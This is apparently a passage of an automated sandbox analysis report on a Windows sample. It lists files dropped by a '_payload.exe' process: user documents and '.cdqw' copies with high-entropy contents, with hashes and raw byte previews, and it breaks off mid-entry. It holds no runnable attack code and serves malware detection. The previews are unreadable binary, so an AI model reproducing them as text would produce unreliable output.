                                                                                                                                                                      Preview:KZWFN.?r]*.H.../.:.. .>s.%..I^...b.}...`..!..SG{.Y....Ibq....T...p.--<G....H.|Q....R.c..uB.....z....|T.9.H..*P..I...Yr...N=#...@.~....:r..>..%+.DJ.O....4...S.>..Ob...k{.f.!..r....dwbm.v.4e.S.._.1..@Z..z.j.h.."..L...[........w...]......V.1J.9.........v8.2.o.Y;u..3.|...j.an....4,.s^.*...N..-.....l......v.h...E{#.`.t(...*'2...&D0ZZ0.9.Y..r....}o......V..ih.C.B...5.9..z....h...n.8.....+.....9..j.P...m>.k......{....+z-.l..`xb...9.4ur.I..........Bj...}j.B.}s...Vh.._..Vb?Z...B..:..X.....~...Q..m-.=*.....K.....(H.8u.Z.i..8....I9tg.....(.r..v..<.......E ..p.7.l.o.@d...F..^.........Q.....s.....o.?f..).5.;..7..A.5$....I.?.M0..b%...fw.2..1..D.F....<......S.*..[lE0N.L...O.u@...|M'S.l....[-........b$N.F.... .+.!...O1...n.."i..o.E..a..'......X.o.k.*.{.5X..+.Ph1.K@.........5 .;jk..E.N.........T8-7.<.,$.-m,[..~....V..j.......Ns^..#...~v...`t.j..H.a.0Wr.. .k}....k(..........A.....)..9s.X.Z.]...X^..#....+q...EI^...s.[)F.%...l..v..K.3HK2.3.`.(.o.

                                                                                                                                                                      C:\Users\user\Desktop\KZWFNRXYKI.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.842618603007528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2FN1PkSroQjM3/WZCmcbEzjjNv73wuyVeA8H7RqpmtIuTo2U16HrRh2bD:afObPWZCmHPjV37rtqpmquUt16V6D
                                                                                                                                                                      MD5:31AB101C97F86F8F3F89F68ED6AA7FCE
                                                                                                                                                                      SHA1:D906328BA56049E6FE0803520D9571F974D4EE5F
                                                                                                                                                                      SHA-256:F299DA707CAA4455B9D6D389B7D6B3040C12E048D0F7BF0EA248EC818278D6EB
                                                                                                                                                                      SHA-512:26DDFBAE42E80792C3518443668B2FADE17461C40279759E72FA097DEE5A5497F0A25754FD2598FFA6A11767C41B4080A878ABF558392FC984C5E8FA1BDF1A8D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.?r]*.H.../.:.. .>s.%..I^...b.}...`..!..SG{.Y....Ibq....T...p.--<G....H.|Q....R.c..uB.....z....|T.9.H..*P..I...Yr...N=#...@.~....:r..>..%+.DJ.O....4...S.>..Ob...k{.f.!..r....dwbm.v.4e.S.._.1..@Z..z.j.h.."..L...[........w...]......V.1J.9.........v8.2.o.Y;u..3.|...j.an....4,.s^.*...N..-.....l......v.h...E{#.`.t(...*'2...&D0ZZ0.9.Y..r....}o......V..ih.C.B...5.9..z....h...n.8.....+.....9..j.P...m>.k......{....+z-.l..`xb...9.4ur.I..........Bj...}j.B.}s...Vh.._..Vb?Z...B..:..X.....~...Q..m-.=*.....K.....(H.8u.Z.i..8....I9tg.....(.r..v..<.......E ..p.7.l.o.@d...F..^.........Q.....s.....o.?f..).5.;..7..A.5$....I.?.M0..b%...fw.2..1..D.F....<......S.*..[lE0N.L...O.u@...|M'S.l....[-........b$N.F.... .+.!...O1...n.."i..o.E..a..'......X.o.k.*.{.5X..+.Ph1.K@.........5 .;jk..E.N.........T8-7.<.,$.-m,[..~....V..j.......Ns^..#...~v...`t.j..H.a.0Wr.. .k}....k(..........A.....)..9s.X.Z.]...X^..#....+q...EI^...s.[)F.%...l..v..K.3HK2.3.`.(.o.

                                                                                                                                                                      C:\Users\user\Desktop\LTKMYBSEYZ.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.83904835996079
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:L6e9KpZHTw9HRXhbXVOenaMz6EipUv+nzWtveBF2rxqd/l9Cdd8BHBdVx1LdDV2X:D9KfzkhpOenaMEFqtWFPhKcHlZuD
                                                                                                                                                                      MD5:72A8412A35C699DAD7B4CF045AFC4845
                                                                                                                                                                      SHA1:3FD3ED660D8995DFDA68883AF368B1B9ACD56FB8
                                                                                                                                                                      SHA-256:8004FE5C010A72D5936E0DBA3DF3E237D76320D98E8946DE664FCA203A311850
                                                                                                                                                                      SHA-512:D67220E7027F564DB2748DD8AF4EF1ABD0DCEC86126F6B36CEC1614DF5F05CBA529AD0D1623422C7B0B3CE72581C34337E3C5B746A688A471AD866D382F34124
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMYW"dE.i.6$.U-p7..I..N..bB...'"F...-.W..}.'.........y..w..Ax.m......Q..k@..Tc...Y... .......jx`.(.q=......Y..K_.8."Pe....g..+..+...l..@o.._....xd.]......b~.hqg6p4.Z...6X1.jg....?......#..)...X........lJ........\B.\7]u.+H.,@...h.7.........{.z.G...=V..U.6..jo|..p...@_...J.JL......R|%b./....;.....,..k.6f....6i...6\..&....H.7..9...8.>.">.V/...^.....n.h.|...)rRVN...J.nQ..H<p..r.y-.B..j........0d......./.u..[.1....D.xv1r%(.E..LiZ.}.....Z^..`..5.i....P.yf...L..h.:u.....;.K.V.=+.,....T....qK.R.g.A.0V.......R.DL..(...!.|w....c....1+.x*...."'.{_na`&.%&E....t.ez.bS...1..".2....e.$...e...j%K...Y.....qM.7.rE.KQ?.aQ..T.K........-......._._P...ywB.T.Qe..L.w..N[P.@..r.l..}5..i.....E...l.0..YNtT.y..wK/k..b......s..".....W.....l.oIkm<+N9.)..[Q...a....3.H....r9.y..W._ .Ky1..R....t..9.Cf..o8"..PR.x........g%z.2.-..^..s...$.....=.....l.o...S}Q.ol..8.-..........i2"..".....Ud...KT.,..J,u...k.{:.......%G.1.1;^0.P+.z..5....g.l.#(....(3....U..Gy.M.^..

                                                                                                                                                                      C:\Users\user\Desktop\LTKMYBSEYZ.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.83904835996079
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:L6e9KpZHTw9HRXhbXVOenaMz6EipUv+nzWtveBF2rxqd/l9Cdd8BHBdVx1LdDV2X:D9KfzkhpOenaMEFqtWFPhKcHlZuD
                                                                                                                                                                      MD5:72A8412A35C699DAD7B4CF045AFC4845
                                                                                                                                                                      SHA1:3FD3ED660D8995DFDA68883AF368B1B9ACD56FB8
                                                                                                                                                                      SHA-256:8004FE5C010A72D5936E0DBA3DF3E237D76320D98E8946DE664FCA203A311850
                                                                                                                                                                      SHA-512:D67220E7027F564DB2748DD8AF4EF1ABD0DCEC86126F6B36CEC1614DF5F05CBA529AD0D1623422C7B0B3CE72581C34337E3C5B746A688A471AD866D382F34124
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMYW"dE.i.6$.U-p7..I..N..bB...'"F...-.W..}.'.........y..w..Ax.m......Q..k@..Tc...Y... .......jx`.(.q=......Y..K_.8."Pe....g..+..+...l..@o.._....xd.]......b~.hqg6p4.Z...6X1.jg....?......#..)...X........lJ........\B.\7]u.+H.,@...h.7.........{.z.G...=V..U.6..jo|..p...@_...J.JL......R|%b./....;.....,..k.6f....6i...6\..&....H.7..9...8.>.">.V/...^.....n.h.|...)rRVN...J.nQ..H<p..r.y-.B..j........0d......./.u..[.1....D.xv1r%(.E..LiZ.}.....Z^..`..5.i....P.yf...L..h.:u.....;.K.V.=+.,....T....qK.R.g.A.0V.......R.DL..(...!.|w....c....1+.x*...."'.{_na`&.%&E....t.ez.bS...1..".2....e.$...e...j%K...Y.....qM.7.rE.KQ?.aQ..T.K........-......._._P...ywB.T.Qe..L.w..N[P.@..r.l..}5..i.....E...l.0..YNtT.y..wK/k..b......s..".....W.....l.oIkm<+N9.)..[Q...a....3.H....r9.y..W._ .Ky1..R....t..9.Cf..o8"..PR.x........g%z.2.-..^..s...$.....=.....l.o...S}Q.ol..8.-..........i2"..".....Ud...KT.,..J,u...k.{:.......%G.1.1;^0.P+.z..5....g.l.#(....(3....U..Gy.M.^..

                                                                                                                                                                      C:\Users\user\Desktop\NWTVCDUMOB.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.876247628986133
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fHgEhD2XagO5J7y/hlS/SwLc2TS0fQey91WCWshtlYwHo+yO5/bBm0JoyA1iYxca:fAEhDSagw7OoHTS0fQ3919PYs9/5/bBE
                                                                                                                                                                      MD5:77938A887E1AA9B5138D73F095E295D8
                                                                                                                                                                      SHA1:16B6566F4DCFE84B8B54823FEB6733988A6A9BD7
                                                                                                                                                                      SHA-256:471A8C2B0E81CBDB080C7E00184F295DD2348BA10291EE6D43DCEFFADB84AD73
                                                                                                                                                                      SHA-512:593BE284C188B5F153756EA1A97BA9B564EF156141D941C7FF0C0ED06038B3523CA4FC558E61038475AB29114F7127007B3E4E44259DFDBAA7BA52D3B5C47814
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:NWTVC...8S...+J..:.5..Mx....=..O.n..k.J.O......3..F....SR~u.a`uq..>..G..-VB...........u.x...k..`b.ko6.l.. A..I.".,.D..........v..i)...i....2...E.,Z...........Z...D.rxF...r*../.FT...>...._@...zZ..A2..I4../Rr.F.m.H<.@.Q'..#..#....y.b.....1.N.x...]..S5.!.........r......-q+O... ..|..k.j....kJ.M.VB.V...W.T.L.I{.c...;...`..../.Yh.5.J@.....0[... ....N,.`Pks.a.....C.3..M..R."..6.H.kQY/U.C...[..x.;dK%z;....a..H.....Rd.....=...y.WxS.M.....6\...o.N..S.J..........l...x..f..P....B.>.....E.O.....r.E....W.l...K.L...!..^.j..A..Aip....&.J.[.._..'.PV.u..v(v....=.T.DO{.y.#..4.......x\.....Ht..g`Q........mn.B..R...Z.....fjv....P....r/D.+p!.Yb....Wn.,:.{.@.....M.4@J^.M<...~=..H........x.."..;.(.(.-.~a2.......7.4.e].\[...L.:...3.I.b.P...Mh..U.t[.r.2......X..D_.R.....&.tk.o....%.}./~.X..zU....^.\...G5.c.U:....b...&.Y_..b.o..L.2......H I.C.!......Ii...Og.#.<..6..Z._HR.u.'..1.q...&t).o.|R...`0e....^.lG..t...(..3....w..._.....fc...<...+...+...K.s.)b.Q.....g

                                                                                                                                                                      C:\Users\user\Desktop\NWTVCDUMOB.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.876247628986133
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fHgEhD2XagO5J7y/hlS/SwLc2TS0fQey91WCWshtlYwHo+yO5/bBm0JoyA1iYxca:fAEhDSagw7OoHTS0fQ3919PYs9/5/bBE
                                                                                                                                                                      MD5:77938A887E1AA9B5138D73F095E295D8
                                                                                                                                                                      SHA1:16B6566F4DCFE84B8B54823FEB6733988A6A9BD7
                                                                                                                                                                      SHA-256:471A8C2B0E81CBDB080C7E00184F295DD2348BA10291EE6D43DCEFFADB84AD73
                                                                                                                                                                      SHA-512:593BE284C188B5F153756EA1A97BA9B564EF156141D941C7FF0C0ED06038B3523CA4FC558E61038475AB29114F7127007B3E4E44259DFDBAA7BA52D3B5C47814
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NWTVC...8S...+J..:.5..Mx....=..O.n..k.J.O......3..F....SR~u.a`uq..>..G..-VB...........u.x...k..`b.ko6.l.. A..I.".,.D..........v..i)...i....2...E.,Z...........Z...D.rxF...r*../.FT...>...._@...zZ..A2..I4../Rr.F.m.H<.@.Q'..#..#....y.b.....1.N.x...]..S5.!.........r......-q+O... ..|..k.j....kJ.M.VB.V...W.T.L.I{.c...;...`..../.Yh.5.J@.....0[... ....N,.`Pks.a.....C.3..M..R."..6.H.kQY/U.C...[..x.;dK%z;....a..H.....Rd.....=...y.WxS.M.....6\...o.N..S.J..........l...x..f..P....B.>.....E.O.....r.E....W.l...K.L...!..^.j..A..Aip....&.J.[.._..'.PV.u..v(v....=.T.DO{.y.#..4.......x\.....Ht..g`Q........mn.B..R...Z.....fjv....P....r/D.+p!.Yb....Wn.,:.{.@.....M.4@J^.M<...~=..H........x.."..;.(.(.-.~a2.......7.4.e].\[...L.:...3.I.b.P...Mh..U.t[.r.2......X..D_.R.....&.tk.o....%.}./~.X..zU....^.\...G5.c.U:....b...&.Y_..b.o..L.2......H I.C.!......Ii...Og.#.<..6..Z._HR.u.'..1.q...&t).o.|R...`0e....^.lG..t...(..3....w..._.....fc...<...+...+...K.s.)b.Q.....g

                                                                                                                                                                      C:\Users\user\Desktop\ONBQCLYSPU.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853868362759174
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pQ/uewkXITVsiYsJ5Bnz7ZACA2SjiSF5nMeHHwG4iHjhjolA/ORU32bD:Kak4TjYsJ7CCqiM5nMeHx4iHj94aO1D
                                                                                                                                                                      MD5:2A496D881FF63860F2F841DC2DA3F28F
                                                                                                                                                                      SHA1:3CEBCE112449EE9FB42455D39074C7F4E5414EA7
                                                                                                                                                                      SHA-256:55E8F559D3B8C59FDAADCE421A2550180C6178605B8705B8F4281845F4EB96F8
                                                                                                                                                                      SHA-512:B60293FB057F32DD4D194A373FF3E6431ED21D6AB91A5C670253E2CA55CC5DE2983C7020D08F8C12DCB5ABC495A4BEC15162AFFDFE8B2519560546A632838FCD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQCJ>.}.t.Z..Z.D.`f1...V-5..4....#=.q.M..ax..h.....=.zZ+o.aN6...\).Sq.Y.C...G.[ii.r..x...W..zs.vU...03...9(.....c...rocs....Vk.fQC.P.-.{..+..V.......ftc.{...y..3.>J...<.F....:...........2...J.......%>n.e..p.:HQmc..)....z.?[......9..zQ.....^.^..o..".H.{..V.....?...[hI.00...7.qS ...rX.A3....:C..[...h.q.A....I......Hz.U>...x.........".>...$..Z..)..}.....h&.|U.$....%M...l'...[.w....3.$..a.r...W....XS.h.h.C.~....!..Sl...........w.UQ8..2lxv..Y..T*.<....!.>P-A......89./n...^...o..T..>....C..T..\...G+t.6..5.'.N./}G^q....Ue. ..iP..'>a...-.........R71=j..FX#..vc(.N.C..X.0.Ar_..+....p..H\..J@.......q.<.....TsL.?....yQ.....+...y.....N..eh3.m"..r....c. ....P..y..c...-s.tp...l..4D..4....XI..P:..F....)&.l...q..F.hB..y......s."......ni/<.H..!.....`).$..8G]|.0.e..fI...I.8Ju7y.Ho.:.........6.%.......h..].;.I.<......kt.....y..[..p+..[~...Cv?..$.4......8.)..h'..U/.....@..1F|.8...... Xe..d}jH<...%.......{..g".|.......m.K.-g.G.|....uF..k....W..?..++W

                                                                                                                                                                      C:\Users\user\Desktop\ONBQCLYSPU.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853868362759174
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pQ/uewkXITVsiYsJ5Bnz7ZACA2SjiSF5nMeHHwG4iHjhjolA/ORU32bD:Kak4TjYsJ7CCqiM5nMeHx4iHj94aO1D
                                                                                                                                                                      MD5:2A496D881FF63860F2F841DC2DA3F28F
                                                                                                                                                                      SHA1:3CEBCE112449EE9FB42455D39074C7F4E5414EA7
                                                                                                                                                                      SHA-256:55E8F559D3B8C59FDAADCE421A2550180C6178605B8705B8F4281845F4EB96F8
                                                                                                                                                                      SHA-512:B60293FB057F32DD4D194A373FF3E6431ED21D6AB91A5C670253E2CA55CC5DE2983C7020D08F8C12DCB5ABC495A4BEC15162AFFDFE8B2519560546A632838FCD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQCJ>.}.t.Z..Z.D.`f1...V-5..4....#=.q.M..ax..h.....=.zZ+o.aN6...\).Sq.Y.C...G.[ii.r..x...W..zs.vU...03...9(.....c...rocs....Vk.fQC.P.-.{..+..V.......ftc.{...y..3.>J...<.F....:...........2...J.......%>n.e..p.:HQmc..)....z.?[......9..zQ.....^.^..o..".H.{..V.....?...[hI.00...7.qS ...rX.A3....:C..[...h.q.A....I......Hz.U>...x.........".>...$..Z..)..}.....h&.|U.$....%M...l'...[.w....3.$..a.r...W....XS.h.h.C.~....!..Sl...........w.UQ8..2lxv..Y..T*.<....!.>P-A......89./n...^...o..T..>....C..T..\...G+t.6..5.'.N./}G^q....Ue. ..iP..'>a...-.........R71=j..FX#..vc(.N.C..X.0.Ar_..+....p..H\..J@.......q.<.....TsL.?....yQ.....+...y.....N..eh3.m"..r....c. ....P..y..c...-s.tp...l..4D..4....XI..P:..F....)&.l...q..F.hB..y......s."......ni/<.H..!.....`).$..8G]|.0.e..fI...I.8Ju7y.Ho.:.........6.%.......h..].;.I.<......kt.....y..[..p+..[~...Cv?..$.4......8.)..h'..U/.....@..1F|.8...... Xe..d}jH<...%.......{..g".|.......m.K.-g.G.|....uF..k....W..?..++W

                                                                                                                                                                      C:\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.886602990859483
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SG5P2LeMCd2ncvK3ZCXadiWP3+8HH8Ksn7tWHxWEIie0MLWzEQvh2bD:POaMCd2nFQXadiM7HH8Ks7jhJaFiD
                                                                                                                                                                      MD5:7F29906473D1296DC5B1D7C59F48BD64
                                                                                                                                                                      SHA1:7D37296D04B8ED1ABB0DA36785F1CC4DB1982335
                                                                                                                                                                      SHA-256:08731361DC23DE7F61814ABBF72FC8960DF3C3272207F6051B8D1A063CAA551A
                                                                                                                                                                      SHA-512:B4EBEE18D631C7F135F134B51977106263AEDCB9794D323E8491195EDB833E15902E6F2017D42DC67B4AF8DB87974DC9E00080375E6936880B33BF8A84D05249
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..d..8.`....t.<-.......cE. n^4....9.ZY....3.&..i1.?2g./....\....c..&.;...u.y.3 ..*.+dmR..4`...=f..p.P......:.^eLd...l9y.U....S...+t.C<).=..~V.t...-...h`...J.(...E.&j.r(.......V....0.*...*-.X.....n......!..^p[....S...g..FPz....V.......+..No.O..z0...8c..L....Ep..m...D....\..}I..S...K....}........F.Q.I....3......cR.!I..b.1....3.&b....O......x....%\.M..M.....Qg.....&1mS...o.F.#.g.........)..7Do.1..0...\..........A.3........a.....^..!.............-..R...G...'0...,v....d:.E....dk..9.'Q.\Q...+,."7...`l........$..0..)..ey.5U........."0..r.P.x.A......~..CX...Qcu....3......}...=..'....Cn.N[6...?G.^,O...`ka.4.o.'.....].....G.....F......W.P."$.......[..u.A.H....@cAI..SO.K...&.. ..=....5....-..Z6.1.. .O4&...aX+e..UW...)...>..-=.H-^..C.....4................nxK...#.\.n.Cg..D.....WbX..@r.+}..J..my )x..%..h.*.....n.UMt..."...%....=y.X.L..8..>0..*..2.^.rQ,.8....1:.....%F...:.!:Z..,T.5....f.....a...e.......w".1....s....@xJ..0o.kv.8..L..|G).

                                                                                                                                                                      C:\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.886602990859483
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SG5P2LeMCd2ncvK3ZCXadiWP3+8HH8Ksn7tWHxWEIie0MLWzEQvh2bD:POaMCd2nFQXadiM7HH8Ks7jhJaFiD
                                                                                                                                                                      MD5:7F29906473D1296DC5B1D7C59F48BD64
                                                                                                                                                                      SHA1:7D37296D04B8ED1ABB0DA36785F1CC4DB1982335
                                                                                                                                                                      SHA-256:08731361DC23DE7F61814ABBF72FC8960DF3C3272207F6051B8D1A063CAA551A
                                                                                                                                                                      SHA-512:B4EBEE18D631C7F135F134B51977106263AEDCB9794D323E8491195EDB833E15902E6F2017D42DC67B4AF8DB87974DC9E00080375E6936880B33BF8A84D05249
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..d..8.`....t.<-.......cE. n^4....9.ZY....3.&..i1.?2g./....\....c..&.;...u.y.3 ..*.+dmR..4`...=f..p.P......:.^eLd...l9y.U....S...+t.C<).=..~V.t...-...h`...J.(...E.&j.r(.......V....0.*...*-.X.....n......!..^p[....S...g..FPz....V.......+..No.O..z0...8c..L....Ep..m...D....\..}I..S...K....}........F.Q.I....3......cR.!I..b.1....3.&b....O......x....%\.M..M.....Qg.....&1mS...o.F.#.g.........)..7Do.1..0...\..........A.3........a.....^..!.............-..R...G...'0...,v....d:.E....dk..9.'Q.\Q...+,."7...`l........$..0..)..ey.5U........."0..r.P.x.A......~..CX...Qcu....3......}...=..'....Cn.N[6...?G.^,O...`ka.4.o.'.....].....G.....F......W.P."$.......[..u.A.H....@cAI..SO.K...&.. ..=....5....-..Z6.1.. .O4&...aX+e..UW...)...>..-=.H-^..C.....4................nxK...#.\.n.Cg..D.....WbX..@r.+}..J..my )x..%..h.*.....n.UMt..."...%....=y.X.L..8..>0..*..2.^.rQ,.8....1:.....%F...:.!:Z..,T.5....f.....a...e.......w".1....s....@xJ..0o.kv.8..L..|G).

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.850521848665566
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:+HC6BWvShrqadhNZ/agNerunuXuBRynbHG+d8rK94BZTy0FAonGNM2bD:+Hp6u2IZSYumynTjReZTydonKD
                                                                                                                                                                      MD5:716B0CA1E0E4B63C6A7B44F2A9C679E7
                                                                                                                                                                      SHA1:FEA27224BF126F55D9B26AD556BCBCD02FB2063A
                                                                                                                                                                      SHA-256:F1A8DCA1797214465A8A0CF8A12D2310FF8D747867B0532D0A96B87AD1D791A0
                                                                                                                                                                      SHA-512:2BEF0E728D76BA8B077C225CFBB590FC3CD4E0581D03BC8B5020522E5DF79A0214A4E9F588402C7761702BD514085C7A7F24FD03DDF45D99F6571FBAC83F6C16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD^1..P#)..7.../..uZg.Al.[U.M....R.(`.e.....L. ...T.........+#..%T5..a......s...F..|$.....p..T..B)..bx..Tr.....LZ..8.[8..2.*c.<!..Y^...1e....&f.K...gwV.z...J...M....d..t..(x\.h...+{....!.k{.}...3.#..rf$.N n..Gw..&y..."~..7.......KQ.....K$-,M.J...0..u.........`(.{-..*.....a.*m0..y6L......j...?Rp...$.Q.q...z:1.G.E.tK..S%fN..}k.?.<.n...h...... E#xt....^..6.0..?R..........iI..(..bXE.5...$....v..84J.o. .3.....A7..vREnpl..{f*...2.N.L..t...S3L..@.f.e..}.Q.h 1..q./.UBsK\/....."o.T....2.*.ia.s...p..}._.F......9.$..S>3..=[.:oKXX.V..MkM=m.}n..E.j..T....Gv..H.{.r.......#..&._..!`.,......-.3Y6.....+P..'....S....v\.|(C..N>...........e.A:...|.2.B...A.z....W..P.#...._t.*i$..r.u..Nr.!.|.sj.sY.s.q.z.N......l...%lg|,{..a..$.(...-.m.r|N?..!..{R.@NK.H.Nm.~.s.TY%.....#[.6.N@...f}..Ka.j.....<d=...C....i....l.S.NFg...mR..54$N.J..'BR....@...].@..OB.L...J......hC.a..........vA....5.MP S./q.L...aU.z........BR..[V.l..W6G.N..lN...%..IK',...QQ].{.|P....,..LW.<

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.850521848665566
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:+HC6BWvShrqadhNZ/agNerunuXuBRynbHG+d8rK94BZTy0FAonGNM2bD:+Hp6u2IZSYumynTjReZTydonKD
                                                                                                                                                                      MD5:716B0CA1E0E4B63C6A7B44F2A9C679E7
                                                                                                                                                                      SHA1:FEA27224BF126F55D9B26AD556BCBCD02FB2063A
                                                                                                                                                                      SHA-256:F1A8DCA1797214465A8A0CF8A12D2310FF8D747867B0532D0A96B87AD1D791A0
                                                                                                                                                                      SHA-512:2BEF0E728D76BA8B077C225CFBB590FC3CD4E0581D03BC8B5020522E5DF79A0214A4E9F588402C7761702BD514085C7A7F24FD03DDF45D99F6571FBAC83F6C16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD^1..P#)..7.../..uZg.Al.[U.M....R.(`.e.....L. ...T.........+#..%T5..a......s...F..|$.....p..T..B)..bx..Tr.....LZ..8.[8..2.*c.<!..Y^...1e....&f.K...gwV.z...J...M....d..t..(x\.h...+{....!.k{.}...3.#..rf$.N n..Gw..&y..."~..7.......KQ.....K$-,M.J...0..u.........`(.{-..*.....a.*m0..y6L......j...?Rp...$.Q.q...z:1.G.E.tK..S%fN..}k.?.<.n...h...... E#xt....^..6.0..?R..........iI..(..bXE.5...$....v..84J.o. .3.....A7..vREnpl..{f*...2.N.L..t...S3L..@.f.e..}.Q.h 1..q./.UBsK\/....."o.T....2.*.ia.s...p..}._.F......9.$..S>3..=[.:oKXX.V..MkM=m.}n..E.j..T....Gv..H.{.r.......#..&._..!`.,......-.3Y6.....+P..'....S....v\.|(C..N>...........e.A:...|.2.B...A.z....W..P.#...._t.*i$..r.u..Nr.!.|.sj.sY.s.q.z.N......l...%lg|,{..a..$.(...-.m.r|N?..!..{R.@NK.H.Nm.~.s.TY%.....#[.6.N@...f}..Ka.j.....<d=...C....i....l.S.NFg...mR..54$N.J..'BR....@...].@..OB.L...J......hC.a..........vA....5.MP S./q.L...aU.z........BR..[V.l..W6G.N..lN...%..IK',...QQ].{.|P....,..LW.<

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\KZWFNRXYKI.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.833098891512211
                                                                                                                                                                      Encrypted:false
